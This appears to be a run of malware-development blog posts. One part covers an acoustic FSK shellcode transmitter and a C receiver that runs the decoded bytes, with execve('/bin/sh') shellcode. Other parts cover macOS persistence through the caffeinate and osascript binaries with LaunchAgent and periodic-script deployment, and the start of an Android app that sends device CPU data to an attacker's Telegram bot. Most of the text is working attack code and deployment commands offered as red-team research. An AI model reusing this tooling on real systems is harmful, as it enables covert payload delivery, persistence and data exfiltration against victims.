int try_offset(const int16_t *audio, int n_samples, int offset) {
  int n_bits = (n_samples - offset) / SPB;
  uint8_t *bits = malloc(n_bits);

  // demodulate audio samples into a digital bit array
  for (int i = 0; i < n_bits; i++) {
    double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
    double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
    bits[i] = (pm > ps) ? 1 : 0;
  }

  // scan bit array for the 40-bit preamble
  for (int i = 0; i < n_bits - 80; i++) {
    int match = 1;
    for (int b = 0; b < 5; b++) if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
    if (!match) continue;

    // preamble found: Extract 16-bit payload length
    int cursor = i + 40;
    uint16_t len = (get_byte(bits, cursor) << 8) | get_byte(bits, cursor + 8);
    cursor += 16;

    uint8_t *payload = malloc(len);
    uint8_t calc_cksum = 0;

    // extract payload and calculate XOR checksum
    for (int p = 0; p < len; p++) {
      payload[p] = get_byte(bits, cursor);
      calc_cksum ^= payload[p];
      cursor += 8;
    }

    // verify integrity against the checksum byte
    if (calc_cksum == get_byte(bits, cursor)) {
      printf("[=^..^=] offset %d: checksum OK. executing %d bytes...\n", offset, len);
      
      // allocate RWX memory and execute shellcode
      void *mem = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
      memcpy(mem, payload, len);
      ((void(*)())mem)();
      return 1;
    }
    free(payload);
  }
  free(bits);
  return 0;
}

int main() {
  snd_pcm_t *h;
  // setup ALSA capture device (microphone)
  snd_pcm_open(&h, "default", SND_PCM_STREAM_CAPTURE, 0);
  snd_pcm_set_params(h, SND_PCM_FORMAT_S16_LE, SND_PCM_ACCESS_RW_INTERLEAVED, 1, SAMPLE_RATE, 1, 100000);

  // capture raw audio into memory buffer
  int total = CAPTURE_SECS * SAMPLE_RATE;
  int16_t *buf = malloc(total * sizeof(int16_t));
  printf("[=^..^=] listening for 6 seconds...\n");
  snd_pcm_readi(h, buf, total);
  snd_pcm_close(h);

  // brute-force: try every possible sample alignment offset
  for (int t = 0; t < N_OFFSETS; t++) {
    if (try_offset(buf, total, t * OFFSET_STEP)) {
      free(buf); return 0;
    }
  }

  printf("[=^..^=] no valid payload found.\n");
  free(buf); return 1;
}

demo

Let’s see this in action.

First of all, compile our receiver:

gcc receiver.c -o receiver -lasound -lm

Then, run it:

./receiver

Within the 6-second window, run transmitter:

python3 transmit_live.py

As we can see, checksum is ok, shellcode successfully spawned. In my case, I had to run transmitter three times.

conslusion

We have built a reliable physical-layer link. However, there is a remaining problem: if an EDR scans the memory of our receiver while it is recording, it might see the shellcode bytes in the bits or payload arrays.

In the next parts, we will introduce the Discrete Fourier Transform (DFT) again. We will stop sending raw bits and start sending frequency coefficients, ensuring the shellcode only exists as “mathematical noise” until the moment of execution.

FSK
Bell 202 standard
Discrete Fourier Transform (DFT)
Goertzel Algorithm
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

Malware shellcode delivery via signal - part 1. FSK Basics. Simple python script

2026-05-24T23:00:00+00:00

﷽

Hello, cybersecurity enthusiasts and white hackers!

In modern red teaming, the “air-gap” remains one of the most challenging obstacles. When a target machine is physically isolated from the network and USB ports are disabled by GPO, how do you deliver a payload?

Welcome to a new series: Signal Processing and Math for Malware R&D. Over the next few parts, I will try to explore how to treat shellcode not as data, but as a signal. We will bridge the air-gap using sound, hide our code in the frequency domain, and use math and physics for malware development.

The initial thought began with me considering how to deliver a payload via an alternative physical channel. I consulted radio enthusiasts, spent hours on Google, and, of course, debated options with AI. My primary candidates were:

acoustic / audio - the simplest method using standard speakers and microphones.
ultrasonic - an “invisible” channel using the same FSK approach but at 18-22 kHz, making it inaudible to humans.
SDR / RF - transmitting via HackRF or LimeSDR and receiving via an RTL-SDR dongle.
IR / Optical - using an LED and a photodiode, encoded as pulse-width modulation (PWM).

After evaluating these vectors, I chose the acoustic / audio path for the zero-hardware dependency reason, another goal wasn’t just to play a sound; it was to build a mathematical pipeline. Starting with an audible acoustic signal allowed me to perfect the Goertzel Algorithm and synchronization logic first. Also I already have using an DFT experience.

In this first part, we will build the simple transmitter: a Python script that converts shellcode into sound using Frequency Shift Keying (FSK).

data to signal and what is FSK?

Frequency Shift Keying (FSK) is a frequency modulation scheme in which digital information is transmitted through discrete frequency changes of a carrier wave.

The simplest form is BFSK (Binary FSK). We choose two distinct frequencies:
$ f_{mark} $ - represents a binary 1.
$ f_{space} $ - represents a binary 0.

For this project, we will use the Bell 202 standard, which was the foundation for early dial-up modems:

Mark frequency ($ f_1 $) - 2200 Hz - this is the high-frequency tone (2200 oscillations per second). To the human ear, it sounds like a sharp, high-pitched beep.
Space frequency ($ f_0 $) - 1200 Hz - this is the low-frequency tone. The wave oscillates almost half as fast as the Mark. It sounds like a duller, lower hum.
Baud rate - 300 bits/second - refers to the number of signal changes per second. In our protocol, 1 Baud = 1 Bit.

To generate the signal for a single bit, we use the standard formula for a sine wave:

\[s(t) = A \cdot \sin(2\pi f t)\]

or:

\[s(t) = A \cdot \cos \big( 2\pi f_i t + \phi_n \big)\]

Where:

$ A $ is the amplitude (volume)
$ f $ is the frequency ($ f_1 $ or $ f_0 $)
$ t $ is the time duration of one bit
$ \phi _{n} $ - is the phase offset tracking constant for the $ n $-th bit interval

Since we are working with digital audio, we process this in the discrete time domain. Given a sampling rate $ f_s $ (usually $ 48000 \text{ Hz} $), the number of samples per bit ($ N $) is calculated as:

\[N = \frac{f_s}{\text{Baud Rate}} = \frac{48000}{300} = 160 \text{ samples}\]

This means every single bit of our shellcode is physically represented by a tiny buffer of 160 floating-point numbers (this is the standard hardware sampling rate. The computer slices one second of sound into 48,000 tiny pieces (samples)):

practical example

We will use numpy for mathematical operations and sounddevice to interface with the system speakers.

First of all, we need sine wave generation logic:

def generate_tone(bit):
    """generates a sine wave for a single bit."""
    freq = FREQ_MARK if bit else FREQ_SPACE
    t = np.arange(SPB) / SAMPLE_RATE
    return np.sin(2 * np.pi * freq * t).astype(np.float32)

this function takes a 0 or 1 and returns a raw array of 160 float values representing the sine wave of that frequency.

Then, we iterate through each bit of a byte (Least Significant Bit first) and concatenate the tones:

def byte_to_signal(byte):
    """converts a single byte into an audio signal (8 bits, LSB first)."""
    bits = [(byte >> i) & 1 for i in range(8)]
    return np.concatenate([generate_tone(b) for b in bits])

Finally, we convert the entire shellcode array, we add 0.5 seconds of silence (the “Guard Interval”) to give the receiver time to initialize and stabilize:

def transmit(payload):
    """encodes the entire payload and plays it through the speakers."""
    print(f"[=^..^=] encoding shellcode ({len(payload)} bytes)...")
    
    # generate the audio signal
    audio_signal = np.concatenate([byte_to_signal(b) for b in payload])
    
    # add some silence at the beginning and end for stability
    silence = np.zeros(int(SAMPLE_RATE * 0.5), dtype=np.float32)
    final_signal = np.concatenate([silence, audio_signal, silence])
    
    print(f"[=^..^=] total signal duration: {len(final_signal)/SAMPLE_RATE:.2f} seconds")
    print("[=^..^=] transmitting via air...")
    
    sd.play(final_signal, SAMPLE_RATE)
    sd.wait()
    
    print("[=^..^=] transmission complete.")

if __name__ == "__main__":
    transmit(SHELLCODE)

The full source code is looks like the following code transmit.py:

#!/usr/bin/env python3
"""
transmit.py
acoustic shellcode transmitter - part 1: basic FSK
author: @cocomelonc
"""
import numpy as np
import sounddevice as sd
import struct

# protocol constants
SAMPLE_RATE = 48000          # standard hardware rate
BAUD_RATE   = 300            # bits per second
FREQ_MARK   = 2200           # frequency for bit 1 (Hz)
FREQ_SPACE  = 1200           # frequency for bit 0 (Hz)
SPB         = SAMPLE_RATE // BAUD_RATE # samples per bit (160)

# linux x64 execve("/bin/sh") for simplicity
SHELLCODE = bytes([
    0x48, 0x31, 0xc0, 0x50, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 
    0x2f, 0x2f, 0x73, 0x68, 0x53, 0x48, 0x89, 0xe7, 0x50, 0x57, 
    0x48, 0x89, 0xe6, 0x48, 0x31, 0xd2, 0xb0, 0x3b, 0x0f, 0x05
])

def generate_tone(bit):
    """generates a sine wave for a single bit."""
    freq = FREQ_MARK if bit else FREQ_SPACE
    t = np.arange(SPB) / SAMPLE_RATE
    return np.sin(2 * np.pi * freq * t).astype(np.float32)

def byte_to_signal(byte):
    """converts a single byte into an audio signal (8 bits, LSB first)."""
    bits = [(byte >> i) & 1 for i in range(8)]
    return np.concatenate([generate_tone(b) for b in bits])

def transmit(payload):
    """encodes the entire payload and plays it through the speakers."""
    print(f"[=^..^=] encoding shellcode ({len(payload)} bytes)...")
    
    # generate the audio signal
    audio_signal = np.concatenate([byte_to_signal(b) for b in payload])
    
    # add some silence at the beginning and end for stability
    silence = np.zeros(int(SAMPLE_RATE * 0.5), dtype=np.float32)
    final_signal = np.concatenate([silence, audio_signal, silence])
    
    print(f"[=^..^=] total signal duration: {len(final_signal)/SAMPLE_RATE:.2f} seconds")
    print("[=^..^=] transmitting via air...")
    
    sd.play(final_signal, SAMPLE_RATE)
    sd.wait()
    
    print("[=^..^=] transmission complete.")

if __name__ == "__main__":
    transmit(SHELLCODE)

as you can, for simplicity used execve("/bin/sh") shellcode here:

SHELLCODE = bytes([
    0x48, 0x31, 0xc0, 0x50, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 
    0x2f, 0x2f, 0x73, 0x68, 0x53, 0x48, 0x89, 0xe7, 0x50, 0x57, 
    0x48, 0x89, 0xe6, 0x48, 0x31, 0xd2, 0xb0, 0x3b, 0x0f, 0x05
])

demo

At this point, we have successfully converted a binary exploit into an acoustic signal.

for this part, we need to set up the audio backend:

sudo apt install libportaudio2 libportaudio-ocaml-dev

and python dependencies:

python3 -m pip install numpy sounddevice

If you run this script, you will hear a series of high and low “beeps” - that is your shellcode literally flying through the air:

python3 transmit.py

as we can see, everything works perfectly.

practical example 2.

Static code is fine, but as researchers, we need to see our signal to understand its behavior. By using matplotlib in interactive mode, we can create a live Oscilloscope and Spectrum Analyzer inside our terminal.

In this example, we utilize a sliding window technique. As sounddevice plays the FSK tones in the background, our loop calculates the current playback position and updates the plots. This visualizes the transitions between our 1200Hz (Space) and 2200Hz (Mark) frequencies in real-time, helping us verify that our modulation is clean and the timing is accurate before we move to the reception phase.

To move from a static script to a live-visualizing transmitter, we need to implement several architectural changes. These changes allow the software to act as a real-time signal analyzer while the audio is playing.

First, we need a function to construct our visualization window. We create two subplots: one for the time domain (to see the actual sine waves) and one for the frequency domain (to see the 1200Hz/2200Hz peaks using Fast Fourier Transform):

def build_figure():
    """sets up the matplotlib figure for live plotting."""
    plt.style.use('dark_background')
    fig, (ax_wave, ax_spec) = plt.subplots(2, 1, figsize=(12, 6))
    fig.suptitle('[=^..^=] live acoustic transmission', color='#00ff88')
    
    # waveform plot setup
    line_wave, = ax_wave.plot(np.arange(WINDOW_SAMPS), np.zeros(WINDOW_SAMPS), color='#00ffff', lw=1)
    ax_wave.set_ylim(-1.2, 1.2)
    ax_wave.set_axis_off()
    
    # spectrum plot setup (FFT)
    freqs = np.fft.rfftfreq(WINDOW_SAMPS, d=1.0/SAMPLE_RATE)
    line_spec, = ax_spec.plot(freqs, np.zeros(len(freqs)), color='#ffaa00', lw=1.5)
    ax_spec.set_xlim(0, 4000)
    ax_spec.set_ylim(0, 1)
    ax_spec.set_xlabel('frequency (Hz)')
    ax_spec.set_ylabel('magnitude')
    
    plt.tight_layout()
    return fig, line_wave, line_spec

In the basic transmit.py version, the script pauses while the sound plays. For live visuals, we use sd.play() without an immediate .wait(). We also initialize a high-precision timer using time.perf_counter() to synchronize the visual “frame” with the audio “sample” currently being played by the hardware:

# start audio in background
sd.play(signal, SAMPLE_RATE)
t_start = time.perf_counter()
plt.ion() # enable matplotlib interactive mode

Also we need implementing the sliding window. Since we cannot plot the entire shellcode at once without it looking like a solid block, we implement a sliding window. As the timer progresses, we calculate the current_sample and extract a small “slice” of the signal to display, keeping the playback position centered:

while True:
    elapsed = time.perf_counter() - t_start
    current_sample = int(elapsed * SAMPLE_RATE)
    
    if current_sample >= total_samples:
        break
        
    # calculate window bounds
    start = max(0, current_sample - WINDOW_SAMPS // 2)
    end = start + WINDOW_SAMPS
    window = signal[start:end]

Finally, we update the data of our existing plot lines instead of redrawing the whole figure (which is too slow). We perform an FFT on the current window to show the “jumping” frequency peaks and refresh the canvas at a target frame rate:

# update waveform
line_wave.set_ydata(window)

# update spectrum via FFT
magnitude = np.abs(np.fft.rfft(window))
if magnitude.max() > 0: 
    magnitude /= magnitude.max() # normalize for consistent height
line_spec.set_ydata(magnitude)

fig.canvas.draw_idle()
plt.pause(0.01) # small pause to allow GUI update

Full source code transmit_live.py:

#!/usr/bin/env python3
"""
transmit_live.py
acoustic shellcode transmitter - part 1: live visualization
author: @cocomelonc
"""
import time
import struct
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt

# protocol constants
SAMPLE_RATE  = 48000
BAUD_RATE    = 300
FREQ_MARK    = 2200          # bit 1 (high)
FREQ_SPACE   = 1200          # bit 0 (low)
SPB          = SAMPLE_RATE // BAUD_RATE # 160 samples per bit

# visualization constants
WINDOW_BITS  = 24            # how many bits to show in the sliding window
WINDOW_SAMPS = SPB * WINDOW_BITS
TARGET_FPS   = 30            # smooth animation

# linux x86_64 execve("/bin/sh")
SHELLCODE = bytes([
    0x48, 0x31, 0xc0, 0x50, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 
    0x2f, 0x2f, 0x73, 0x68, 0x53, 0x48, 0x89, 0xe7, 0x50, 0x57, 
    0x48, 0x89, 0xe6, 0x48, 0x31, 0xd2, 0xb0, 0x3b, 0x0f, 0x05
])

def generate_tone(bit):
    """generates a sine wave for a single bit."""
    freq = FREQ_MARK if bit else FREQ_SPACE
    t = np.arange(SPB) / SAMPLE_RATE
    return np.sin(2 * np.pi * freq * t).astype(np.float32)

def byte_to_signal(byte):
    """converts a single byte into an audio signal."""
    return np.concatenate([generate_tone((byte >> i) & 1) for i in range(8)])

def build_figure():
    """sets up the matplotlib figure for live plotting."""
    plt.style.use('dark_background')
    fig, (ax_wave, ax_spec) = plt.subplots(2, 1, figsize=(12, 6))
    fig.suptitle('[=^..^=] live acoustic transmission', color='#00ff88')
    
    # waveform plot setup
    line_wave, = ax_wave.plot(np.arange(WINDOW_SAMPS), np.zeros(WINDOW_SAMPS), color='#00ffff', lw=1)
    ax_wave.set_ylim(-1.2, 1.2)
    ax_wave.set_axis_off()
    
    # spectrum plot setup (FFT)
    freqs = np.fft.rfftfreq(WINDOW_SAMPS, d=1.0/SAMPLE_RATE)
    line_spec, = ax_spec.plot(freqs, np.zeros(len(freqs)), color='#ffaa00', lw=1.5)
    ax_spec.set_xlim(0, 4000)
    ax_spec.set_ylim(0, 1)
    ax_spec.set_xlabel('frequency (Hz)')
    ax_spec.set_ylabel('magnitude')
    
    plt.tight_layout()
    return fig, line_wave, line_spec

def transmit_live(payload):
    # prepare the signal
    body = np.concatenate([byte_to_signal(b) for b in payload])
    lead = np.zeros(int(SAMPLE_RATE * 0.5), dtype=np.float32)
    signal = np.concatenate([lead, body, lead])
    total_samples = len(signal)
    
    print(f"[=^..^=] shellcode: {len(payload)} bytes")
    print(f"[=^..^=] duration : {total_samples/SAMPLE_RATE:.2f} seconds")

    # setup visualization
    fig, line_wave, line_spec = build_figure()
    plt.ion() # interactive mode ON
    plt.show()

    # start audio in background
    print("[=^..^=] transmitting...")
    sd.play(signal, SAMPLE_RATE)
    start_time = time.perf_counter()

    # live plot loop
    while True:
        elapsed = time.perf_counter() - start_time
        current_sample = int(elapsed * SAMPLE_RATE)
        
        if current_sample >= total_samples:
            break
            
        # sliding window logic
        start = max(0, current_sample - WINDOW_SAMPS // 2)
        end = start + WINDOW_SAMPS
        
        if end > total_samples:
            end = total_samples
            start = end - WINDOW_SAMPS

        window = signal[start:end]
        
        # update waveform
        line_wave.set_ydata(window)
        
        # update spectrum (FFT)
        mag = np.abs(np.fft.rfft(window))
        if mag.max() > 0: mag /= mag.max() # normalize
        line_spec.set_ydata(mag)

        fig.canvas.draw_idle()
        plt.pause(1/TARGET_FPS)

    sd.wait()
    plt.ioff() # interactive mode OFF
    print("[=^..^=] done.")
    plt.show()

if __name__ == "__main__":
    transmit_live(SHELLCODE)

demo 2

Let’s see this update in action. First we need to install matploitlib:

python3 -m pip install matploitlib

Then, just run:

python3 transmit_live.py

conclusion

However, a signal is useless without a “ear” to hear it. In part 2, we will move to the victim’s side and implement the Goertzel Algorithm in pure C to demodulate this sound and recover our bytes in real-time.

FSK
Bell 202 standard
Discrete Fourier Transform (DFT)
Goertzel Algorithm
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

MacOS malware persistence 11: osascript LOLBin. Simple C example

2026-04-27T00:00:00+00:00

﷽

Hello, cybersecurity enthusiasts and white hackers!

Continuing the macOS malware persistence series. Today we look at another Apple-signed LOLBin: osascript - the command-line interpreter for AppleScript and JavaScript for Automation (JXA). Used in the wild by APT32 and malware families like OSX.Coldroot RAT, it is one of the most versatile LOLBins on macOS.

osascript

osascript lives at /usr/bin/osascript and is present on every macOS including Monterey and Sonoma. Its job is to execute AppleScript or JXA scripts - but it also accepts inline expressions via the -e flag, which is what we exploit.

Check availability:

which osascript

ls -la /usr/bin/osascript

Confirm Apple-signed:

codesign -dv /usr/bin/osascript 2>&1

The key property for us: osascript -e 'do shell script "/path/to/binary"' runs any executable as the current user with no password prompt. The with administrator privileges keyword is what triggers the dialog - without it, the command runs silently. The process tree will show /usr/bin/osascript as the parent of our payload.

practical example

Simple beacon loop - same idea as the previous posts. Every 10 seconds it appends the timestamp, pid, uid, and ppid to /tmp/meow.txt. The ppid will be osascript’s PID, proving the LOLBin wrapping works (hack.c):

/*
 * hack.c
 * osascript LOLBin persistence PoC - beacon loop
 * author: @cocomelonc
 * https://cocomelonc.github.io/macos/2026/04/27/mac-malware-persistence-11.html
 */
#include 
#include 
#include 

int main(void) {
  const char *log_path = "/tmp/meow.txt";
  FILE *f;

  for (;;) {
    f = fopen(log_path, "a");
    if (f) {
      time_t now = time(NULL);
      fprintf(f, "[=^..^=] meow! osascript persistence triggered.\n");
      fprintf(f, "timestamp: %s", ctime(&now));
      fprintf(f, "pid: %d, uid: %d, ppid: %d\n",
              (int)getpid(), (int)getuid(), (int)getppid());
      fprintf(f, "-------------------------------------\n");
      fclose(f);
    }
    sleep(10);
  }
  return 0;
}

Compile:

clang -o /Users/Shared/hack hack.c

demo 1: pure osascript

The simplest form - wrap the binary directly in an inline osascript expression and background it:

osascript -e 'do shell script "/Users/Shared/hack"' &

Because hack loops forever, osascript stays alive waiting for it to return. No password dialog appears since we are not using with administrator privileges.

Check the process tree:

ps aux | grep osascript

Check the log:

cat /tmp/meow.txt

The ppid in the log matches the osascript PID from ps aux. =^..^=

As with caffeinate in persistence part 10, this form does not survive a logout - it is the live-session variant. For true persistence, we need example 2.

practicale example 2: osascript + LaunchAgents ???

Same plist structure as persistence part 1, but /usr/bin/osascript is the first entry in ProgramArguments.

There is an important caveat here. The AppleScript do shell script verb requires access to the Aqua session (window server). When launchd loads a LaunchAgent, it may not have that session available yet, so do shell script returns an input/output error:

In my case this only works for macOS Monterey, not works for macOS Sonoma in my case….

For fix this I tried to switch from AppleScript to JXA (JavaScript for Automation) and use NSTask directly - it speaks to the OS kernel, not the GUI layer, and works reliably in non-interactive launchd contexts.

meow.plist:

 version="1.0">

    Label
    com.malware.meow
    ProgramArguments
    
        /usr/bin/osascript
        -l
        JavaScript
        -e
        ObjC.import('Foundation');var t=$.NSTask.alloc.init;t.launchPath='/Users/Shared/hack';t.arguments=[];t.launch;t.waitUntilExit;
    
    RunAtLoad
    
    KeepAlive
    

The -l JavaScript flag switches osascript to JXA mode. NSTask launches our binary as a child process and waitUntilExit keeps osascript alive until it finishes - since hack loops forever, osascript stays resident. KeepAlive makes launchd restart the whole chain if either process dies.

demo 2

Deploy the plist:

mkdir -p ~/Library/LaunchAgents
cp meow.plist ~/Library/LaunchAgents/com.malware.meow.plist
launchctl load ~/Library/LaunchAgents/com.malware.meow.plist

Not works!

On Sonoma, launchctl load is deprecated and returns an input/output error. Try to use bootstrap instead:

launchctl bootstrap gui/$(id -u) ~/Library/LaunchAgents/com.malware.meow.plist

Also not works!

Check the log:

cat /tmp/meow.txt

As you can see, everything works perfectly only for first example as expected. Let’s try to combine another persistence trick for survives across sessions. =^..^=

For the purity of experiment, unload cleanly:

launchctl bootout gui/$(id -u) ~/Library/LaunchAgents/com.malware.meow.plist

practical example 3: osascript + periodic script

Since the LaunchAgent approach has session limitations on Sonoma, let’s combine osascript with the periodic system - already explored in persistence part 8. The periodic script runs as root in a proper shell context, and we call osascript from inside it. do shell script still requires the Aqua session, so we keep the JXA + NSTask approach - it works in any shell context regardless of GUI availability.

The wrapper script (999.meow):

#!/bin/sh
# 999.meow
# osascript LOLBin via periodic - runs hack through JXA NSTask
if [ -x /Users/Shared/hack ]; then
    /usr/bin/osascript -l JavaScript -e \
        'ObjC.import("Foundation");var t=$.NSTask.alloc.init;t.launchPath="/Users/Shared/hack";t.arguments=[];t.launch;t.waitUntilExit;'
fi

Inside single quotes $ is literal, so no shell escaping needed for the ObjC bridge prefix.

demo 3

Deploy the script:

sudo cp 999.meow /etc/periodic/daily/
sudo chmod +x /etc/periodic/daily/999.meow

Trigger manually without waiting until 03:15 AM:

sudo periodic daily

Check the log:

cat /tmp/meow.txt

It works!

The ppid in the log is osascript’s PID - our C binary was launched through the LOLBin chain: periodic ->> /bin/sh ->> osascript (JXA) ->> hack. =^..^=

osascript is fully Apple-signed and present on Monterey and Sonoma - no legacy caveats here, unlike emond or periodic alone.

I hope this post is useful for malware R&D and red teaming labs, Apple/Mac researchers, and blue team specialists.

APT32
macOS hacking part 1
macOS persistence part 1
macOS persistence part 10
source code in github

Thanks for your time happy hacking and good bye! PS. All drawings and screenshots are mine

MacOS malware persistence 10: caffeinate LOLBin. Simple C example

2026-04-23T00:00:00+00:00

﷽

Hello, cybersecurity enthusiasts and white hackers!

This post continues the macOS malware persistence series. Today we look at an overlooked LOLBin (Living Off the Land Binary) trick: abusing the built-in caffeinate utility to wrap a malicious payload and keep it alive.

caffeinate

caffeinate ships with every macOS since OS X 10.8 Mountain Lion and lives at /usr/bin/caffeinate. Its job is to hold a power management assertion so the system does not sleep - commonly used by developers and sysadmins to keep a Mac awake during long downloads, builds, or backups.

Check it is present on our Sonoma or Monterey VM:

which caffeinate

ls -la /usr/bin/caffeinate

Confirm it is Apple-signed:

codesign -dv /usr/bin/caffeinate 2>&1

Man page:

man caffeinate

Quick flag reference:

-d   prevent display sleep
-i   prevent idle sleep
-s   prevent system sleep (AC power)
-w    hold assertion until that PID exits
caffeinate    run cmd and prevent sleep while it runs

The key property for us: caffeinate -i spawns our binary as a child process and holds the sleep assertion for as long as that child is alive. ps aux shows /usr/bin/caffeinate as the parent - a fully Apple-signed, completely legitimate binary.

practical example

First, let’s write a simple C “malware” loop. Same idea as in persistence part 1 - write proof of execution to a log file every 10 seconds. We also print the ppid so we can confirm caffeinate is the parent (hack.c):

/*
 * hack.c
 * caffeinate LOLBin persistence PoC
 * author: @cocomelonc
 * https://cocomelonc.github.io/macos/2026/04/23/mac-malware-persistence-10.html
 */
#include 
#include 
#include 

int main(void) {
  const char *log_path = "/tmp/meow.txt";
  FILE *f;

  for (;;) {
    f = fopen(log_path, "a");
    if (f) {
      time_t now = time(NULL);
      fprintf(f, "[=^..^=] meow! caffeinate persistence triggered.\n");
      fprintf(f, "timestamp: %s", ctime(&now));
      fprintf(f, "pid: %d, uid: %d, ppid: %d\n",
              (int)getpid(), (int)getuid(), (int)getppid());
      fprintf(f, "-------------------------------------\n");
      fclose(f);
    }
    sleep(10);
  }
  return 0;
}

demo 1: pure caffeinate

Let’s see this technique in action. Compile our malware:

clang -o /Users/Shared/hack hack.c

The simplest form - wrap the binary directly in caffeinate and background it:

caffeinate -i /Users/Shared/hack &

Confirm the parent-child relationship:

ps aux | grep caffeinate

Check the log:

cat /tmp/meow.txt

The ppid in the log matches the caffeinate PID from ps aux. =^..^=

Note that in this form, the process does not survive a logout. This is the “live session” variant - useful for post-exploitation to keep a beacon alive without installing anything. For true persistence we need example 2.

practical example 2: caffeinate + LaunchAgents

Same approach as persistence part 1, but we put caffeinate as the first entry in ProgramArguments so launchd runs our binary through caffeinate. meow.plist:

 version="1.0">

    Label
    com.malware.meow
    ProgramArguments
    
        /usr/bin/caffeinate
        -i
        /Users/Shared/hack
    
    RunAtLoad
    
    KeepAlive
    

KeepAlive makes launchd restart the whole caffeinate+hack chain if either process dies.

demo 2

Add our plist to LaunchAgents:

mkdir -p ~/Library/LaunchAgents
cp meow.plist ~/Library/LaunchAgents/com.malware.meow.plist

Load it:

launchctl load ~/Library/LaunchAgents/com.malware.meow.plist

Confirm the service is running:

launchctl list | grep meow

Check the log file:

cat /tmp/meow.txt

As you can see, everything works perfectly as expected. The ppid in the log is caffeinate’s PID. Logout and login again - a fresh set of entries with a new pid/ppid pair will appear, proving the persistence survives across sessions. =^..^=

caffeinate is a fully Apple-signed binary present on Monterey and Sonoma - no legacy caveats here, unlike emond or periodic.

Also perfectly works on my ARM MacBook Air:

uname -a

codesign -dv /usr/bin/caffeinate 2>&1

Compile and run:

clang -o /Users/Shared/hack hack.c
caffeinate -i /Users/Shared/hack

I hope this post is useful for malware R&D and red teaming labs, Apple/Mac researchers, and blue team specialists.

macOS hacking part 1
macOS persistence part 1
macOS persistence part 9
source code in github

Thanks for your time happy hacking and good bye! PS. All drawings and screenshots are mine

Mobile malware development trick 3. CPU info logger: anti-VM and anti-sandbox. Simple Android (Kotlin) example.

2026-04-12T00:00:00+00:00

﷽

This post is based on a section from my BSides Prishtina 2024 Malware Development Workshop, decided to add this to my blog so that everything would be in one place.

In this post we will look at how Android malware can collect CPU information from a device to perform anti-VM and anti-sandbox checks. We will build a simple proof-of-concept Android app in Kotlin that reads /proc/cpuinfo, collects hardware build metadata via the android.os.Build API, and exfiltrates everything to an attacker-controlled Telegram bot via OkHttp.

If you pay attention to hardware name in the first post about the Android stealer, you can find something like the following:

When security researchers analyse a suspicious Android app they usually run it inside a sandbox or an emulator. Tools like ANY.RUN or the standard Android Virtual Device (AVD) simulate a real phone. The problem for the malware author is that an emulator is not a real phone and it is surprisingly easy to tell the difference from inside the app.

The Android kernel exposes /proc/cpuinfo - on a real phone you see something like Cortex-A78, but on an emulator you almost always see QEMU Virtual CPU or the hardware name Goldfish, which is the code name Google uses for its emulator chip. Beyond /proc/cpuinfo, the android.os.Build constants are also full of placeholder strings like generic, android-build, or sdk_gphone64_x86_64 that would never appear on a retail device. Malware can read all of this without asking for a single dangerous permission.

practical example

Let’s create a simple CPU information logger app (Android).

Our project structure (HackCpu):

The app only needs INTERNET permission (for Telegram API connection). Reading /proc/cpuinfo and the Build constants does not require any runtime permission at all:

 xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools">

    
        android:name="android.hardware.telephony"
        android:required="false" />
     android:name="android.permission.INTERNET"/>

    
        android:allowBackup="true"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@drawable/cat"
        android:label="@string/app_name"
        android:roundIcon="@drawable/cat"
        android:supportsRtl="true"
        android:theme="@style/Theme.Hack"
        tools:targetApi="31">
        
            android:name=".HackMainActivity"
            android:exported="true"
            android:theme="@style/Theme.Hack">
            
                 android:name="android.intent.action.MAIN" />
                 android:name="android.intent.category.LAUNCHER" />
            
        
    

Then ensure you have the OkHttp dependency in your build.gradle:

implementation 'com.squareup.okhttp3:okhttp:4.11.0'

HackMainActivity is minimal. The key detail is that logcpuinfo() and sendTextMessage() are called inside onCreate, so they run the moment the app starts - before the user touches anything:

package cocomelonc.hackcpu

import android.os.Bundle
import androidx.activity.ComponentActivity
import android.widget.Button
import android.widget.Toast

class HackMainActivity : ComponentActivity() {
    private lateinit var meowButton: Button
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        meowButton = findViewById(R.id.meowButton)
        meowButton.setOnClickListener {
            Toast.makeText(
                applicationContext,
                "Meow! ♥\uFE0F",
                Toast.LENGTH_SHORT
            ).show()
            HackNetwork(this).sendTextMessage("Meow! ♥\uFE0F")
        }
        HackNetwork(this).logcpuinfo()
        HackNetwork(this).sendTextMessage("Meow! ♥\uFE0F")
    }
}

As usual, the interesting logic lives in HackNetwork. First, the logcpuinfo() function. Android is built on top of the Linux kernel and inherits its /proc filesystem. /proc/cpuinfo is a plain-text file the kernel generates on the fly. We open it with a buffered reader and send chunk by chunk:

fun logcpuinfo() {
    val cpuinfo = File("/proc/cpuinfo")
    val TAG = "HACK"

    if (!cpuinfo.exists()) {
        sendTextMessage("[-] /proc/cpuinfo not found")
        return
    }

    try {
        // read the whole file content
        val fullContent = cpuinfo.readText()
        val dataToSend = fullContent + "\nmeow =^..^="

        // split into chunks if length exceeds limit
        if (dataToSend.length <= tgLimit) {
            sendTextMessage(dataToSend)
        } else {
            var start = 0
            while (start < dataToSend.length) {
                val end = minOf(start + tgLimit, dataToSend.length)
                val chunk = dataToSend.substring(start, end)

                // send current chunk
                sendTextMessage(chunk)
                start += tgLimit

                // small delay to prevent telegram rate limiting (429)
                Thread.sleep(500)
            }
        }
        Log.i(TAG, "[+] exfiltration to telegram complete. meow =^..^=")

    } catch (e: Exception) {
        Log.e(TAG, "[x] error during exfiltration: ${e.message}")
        sendTextMessage("[x] error reading cpuinfo: ${e.message}")
    }
}

